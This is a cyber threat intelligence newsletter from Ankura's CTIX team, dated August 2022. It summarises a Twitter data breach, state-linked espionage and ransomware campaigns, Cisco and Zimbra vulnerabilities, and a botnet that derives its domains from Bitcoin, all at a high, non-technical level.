Ransomware/Malware Activity
Twitter Confirms Data Breach Affecting 5.4 Million Account Profiles
On August 5, 2022, Twitter confirmed it has suffered a data breach after receiving a report of a vulnerability through its HackerOne bug bounty program in January 2022. Twitter explained that "if someone submitted an email address or phone number to Twitter's systems, Twitter's systems would tell the person what Twitter account the submitted email addresses or phone number was associated with, if any." This vulnerability was patched on January 13, 2022; Twitter added that there was no evidence that the vulnerability had been exploited at the time of patching. A threat actor, however, posted in a hacking forum on July 21, 2022, that they were able to compile a list of approximately 5.4 million Twitter account profiles using the vulnerability in December 2021. The collected data includes a user's verified phone number or email address as well as scraped public data, which could include follower count, login name, screen name, profile picture URL, location, and more. BleepingComputer confirmed on August 5, 2022, that two (2) additional threat actors have purchased the data for less than $30,000 and that the data will likely be released in the future for free. To mitigate the risk of users' information being compromised, Twitter recommends "not adding a publicly known phone number or email address," in order to keep their identities concealed (aka burner contact information). Twitter also added that it is "particularly mindful of people with pseudonymous accounts who can be targeted by state or other actors" and that all users should enable two-factor authentication as an additional safety precaution.
- Bleeping Computer: Twitter Article
- The Record: Twitter Article
- Twitter Privacy Center: Security Advisory
Threat Actor Activity
Chinese Threat Group Attributed to Cyber Espionage Campaign
Chinese threat actors have successfully executed a sophisticated and devastating cyber espionage attack against multiple government entities and defense industries within Afghanistan, Belarus, Russia, and Ukraine. In early January 2022, TA428 launched the attack in Eastern Europe and Asia against industrial plants, research and development institutes, and several government agencies and departments in the attacked countries. TA428 used a series of spear phishing emails to deploy malware using the exploit CVE-2017-11882 to deploy PortDoor malware. This same method was used in 2021 to infiltrate Russian submarine defense contractors. Additional malware was later installed, including a new malware dubbed “CotSam.” In order to ensure the delivery of CotSam, TA428 included a vulnerable version of Microsoft Word with the payload to ensure the exploit would function as intended. Using the multiple backdoors installed, TA428 proceeded with lateral movement, compromising large swaths of the infected networks. It appears that a large amount of lateral movement and password harvesting was accomplished, allowing the threat actor to gain domain privileges and extract confidential files from the networks. The stolen data was then forwarded to a second stage command-and-control (C2) server with a Chinese IP address, adding evidence to the Chinese attribution of the attack. Also given the consistent use of the same malware and methodology, much of the evidence points to this being a continuation of Chinese espionage attacks that began in 2019. CTIX analysts will continue to report on the behavior of state-sponsored threat actors, and if further fallout stems from this TA428 campaign, a future update may be published.
Iranian Hackers Likely Behind Cyberattacks Against Albanian Government
On July 17, 2022, Albania’s National Agency of Information Society was forced to close access to online public services and governmental websites due to a series of unattributed cyberattacks. On July 21, 2022, a group calling themselves “HomeLand Justice” claimed responsibility for the ransomware activity and began posting updates on the operation against the Albanian government to the website “homelandjustice[.]ru” and to a Telegram channel by the same name. Additionally, the actors shared internal government documents and Albanian residence permits, marriage certificates, passports, and images of People's Mojahedin Organization of Iran (MEK) members. The website and Telegram channel both use a banner image that is similar to the wallpaper used by ROADSWEEP, the ransom used to cause the disruptions, with the same political language used. ROADSWEEP is a new ransomware tool that enumerates all files on an infected device and encrypts their content in blocks using Rivest Cipher 4 (RC4), a stream cipher that is widely used due to its simplicity and speed. A sample of the ransomware was submitted to a public malware repository from Albania on July 22, which, once executed, decrypts and drops a politically motivated ransom note that states “Why should our taxes be spent on the benefit of DURRES terrorists?” Mandiant researchers also identified a Telegram persona of the same name that targets the Albanian government. Mandiant researchers also identified CHIMNEYSWEEP as malware used during the attack. CHIMNEYSWEEP, first identified in 2012, is a backdoor that uses either Telegram or actor owned infrastructure as a command-and-control (C2) center. Interestingly, CHIMNEYSWEEP also shares code with ROADSWEEP, and has been used to target Farsi and Arabic speakers in the past. Like ROADSWEEP, CHIMNEYSWEEP uses an embedded RC4 key. The backdoor drops with a benign Word, Excel, or video file and a self-extracting archive with a legitimate digital certificate. In addition, the threat actors who have claimed responsibility for the attack also claim to have used a wiper malware in the attacks. Currently, it is unclear as to which wiper was used, but Mandiant researchers found that an Albanian user submitted a sample of ZEROCLEAR to a public malware repository on July 19, coinciding with the attack timeline. ZEROCLEAR has previously been reported to have links to Iranian threat actors. No state sponsored threat group has been attributed to the attacks yet, but Mandiant researchers determine with confidence that the threat actors operate in support of Iran. The complexity of CHIMNEYSWEEP also hints to the possibility of cross team collaboration. CTIX Analysts will continue to monitor the situation as it develops.
- The Hacker News: Cyberattacks Against Albanian Government Article
- Mandiant: Cyberattacks Against Albanian Government Report
Vulnerabilities
Cisco Patches Critical Vulnerabilities Affecting Small Business Routers
Cisco has issued a security advisory urging their customers to patch Small Business RV series routers susceptible to exploitation by three (3) severe vulnerabilities, with two (2) of them having a CVSS score of 9.8 (critical), and one (1) having a score of 8.3 (high). According to Cisco, these flaws are dependent on one another, and the exploitation of one (1) of the vulnerabilities may be a prerequisite to exploiting one of the others. A Cisco spokesperson also stated that "…a software release that is affected by one of the vulnerabilities may not be affected by the other vulnerabilities." The flaws are tracked as, CVE-2022-20827 (9.8), CVE-2022-20841 (9.8), and CVE-2022-20842 (8.3), and specifically affect the web-facing management interface, filter database, and Open Plug and Play (PnP) modules respectively. If exploited, these vulnerabilities could allow an unauthenticated remote attacker to inject and execute arbitrary code or induce denial-of-service (DoS) conditions in vulnerable routers, rendering them inoperable until the DoS attack is over. Although at this time there is no evidence of active exploitation of these vulnerabilities, a non-exhaustive Shodan search identified more than 12,000 Cisco web-management interfaces that are exposed to the public internet. Now that the vulnerabilities have become public, attackers will be looking to exploit devices that administrators are slow to update. These flaws affect the RV160, RV260, RV340, and RV345 Series Routers, and details can be found in the Cisco advisory linked below. There is no workaround to mitigate these vulnerabilities, and CTIX analysts urge all Cisco router users/administrators to upgrade to the latest stable version immediately to prevent exploitation.
CISA Adds Already Patched Vulnerability to its Known Exploited Vulnerabilities Catalog
UPDATE to 6/17/2022 FLASH UPDATE: The Cybersecurity and Infrastructure Security Agency (CISA) has added an actively exploited zero-click high-severity vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. This flaw affects an enterprise email solution called Zimbra, and was identified in March 2022, and patched in in May 2022. In June 2022, SonarSource published an in-depth technical writeup on their blog, and today hackers are using the report to reverse engineer the exploit and look for unpatched vulnerable instances to attack in-the-wild. The vulnerability, tracked as CVE-2022-27924, is a Memcache poisoning with an unauthenticated request flaw caused by CRLF (Carriage Return, Line Feed) injection. In a CRLF injection, the attacker injects special characters into a web application, allowing them to falsify log file entries or add extra HTTP headers to a response to perform cross-site-scripting (XSS) attacks. If exploited, this vulnerability could allow unauthenticated attackers to steal credentials for victim email accounts, as well as tricking Zimbra into forwarding email traffic to the attacker by overwriting Internet message Access Protocol (IMAP) route entries that forward when the authorized user logs-in. This exploit is avoidable in instances of Zimbra that have applied the May 2022 patch, but enough Zimbra administrators have failed to update their instances that CISA has been forced to step in. With the adding of this exploit to the KEV catalog, Federal Civilian Executive Branch (FCEB) agencies are now obligated to remediate this vulnerability in accordance with CISA's Binding Operational Directive (BOD) 22-01. This flaw carries significant risk to the federal enterprise, and failure to comply with BOD 22-01 could lead to heavy fines against the negligent party. CTIX analysts recommend that all agencies and companies utilizing the Zimbra email platform, update to the most recent secure version of the solution.
Honorable Mention
"Orchard" Botnet Uses Genesis Bitcoin Address for its Domain Generation Algorithm
A new botnet dubbed “Orchard” has been discovered by 360 Netlab researchers. The standout feature is the ability to generate new command-and-control (C2) domains using Bitcoin transactions. Domain Generation Algorithms (DGAs) have been present in botnets for years; they allow the botnet to change C2 domains without communication between the victim machine and the C2 server, preventing defenders from discovering the new domain name. Most botnets use a time-based algorithm to generate the new domains; this input enables researchers to predict and discover domains before they are used. Orchard instead uses a Bitcoin address's information to generate the domain name. To do this, it makes an HTTP request to the blockchain.info API with the "Genesis" Bitcoin wallet address of Satoshi Nakamoto, the creator of Bitcoin. This particular address is sent a small amount Bitcoin every few days for various reasons. This creates a variable input that cannot be predicted. While Orchard's main goal is to mine cryptocurrency on the affected systems, it is still under active development and its purpose could change. CTIX analysts are continuing to monitor the development of this botnet and will update for any new developments.
The semi-weekly Ankura Cyber Threat Investigations and Expert Services (CTIX) FLASH Update is designed to provide timely and relevant cyber intelligence pertaining to current or emerging cyber events. The preceding is a collection of cyber threat intelligence leads assembled over the past few days and typically includes high level intelligence pertaining to recent threat group/actor activity and newly identified vulnerabilities impacting a wide range of industries and victims. Please feel free to reach out to Flash (flash@ankura.com) if additional context is needed and the CTIX team (ctix@ankura.com) for threat intelligence inquiries.
© Copyright 2022. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.
